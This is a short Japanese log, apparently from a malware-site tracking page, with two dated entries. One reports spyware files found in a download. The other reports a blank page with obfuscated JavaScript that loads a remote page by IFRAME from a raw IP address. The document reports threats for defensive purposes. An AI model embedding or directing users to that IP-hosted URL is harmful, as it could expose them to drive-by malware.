[2006/06/17] | DL+解凍後、いくつかのファイルが現れるが、その中の「WinDmy.dll」からウィルス名:SPYW_GETMIRAR.A を検出する。その他のファイルもスパイウェア関係のファイルである。 |
[2008/10/08] | 真っ白なページだが、ウィルス名:JS_OBFUS.CC を検出。2回目以降の確認ではウィルス未検出。
このサイトは、'RealNetworks,Inc.'からの'RealPlayer plug-in for Internet Explorer'アドオンを実行しようとしている。 また、このサイトは、IFRAMEタグを使って //59.34.216.143/a1/fxx.htm を呼び出している。 |